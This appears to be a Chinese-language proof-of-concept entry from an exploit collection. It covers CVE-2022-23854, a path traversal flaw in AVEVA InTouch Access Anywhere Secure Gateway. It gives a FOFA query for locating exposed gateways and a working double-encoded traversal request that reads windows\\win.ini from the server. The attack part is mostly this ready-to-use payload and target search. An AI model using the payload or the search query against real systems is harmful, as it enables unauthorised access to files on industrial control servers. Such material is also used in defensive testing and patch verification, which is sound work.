Awesome-POC/Web应用漏洞/AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854.md
2022-12-05 11:09:28 +08:00

31 lines
722 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# AVEVA InTouch安全网关 AccessAnywhere 任意文件读取漏洞 CVE-2022-23854
## 漏洞描述
AVEVA InTouch Access Anywhere Secure Gateway 2020 R2及以前的版本存在路径遍历漏洞未授权的攻击者可利用该漏洞获取服务器敏感信息。
## 漏洞影响
```
AVEVA InTouch安全网关
```
## FOFA
```
body="InTouch Access Anywhere"
```
## 漏洞复现
登录页面
![image-20221017170909794](./images/202210171709863.png)
验证POC
```
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
```
![image-20221017170935596](./images/202210171709651.png)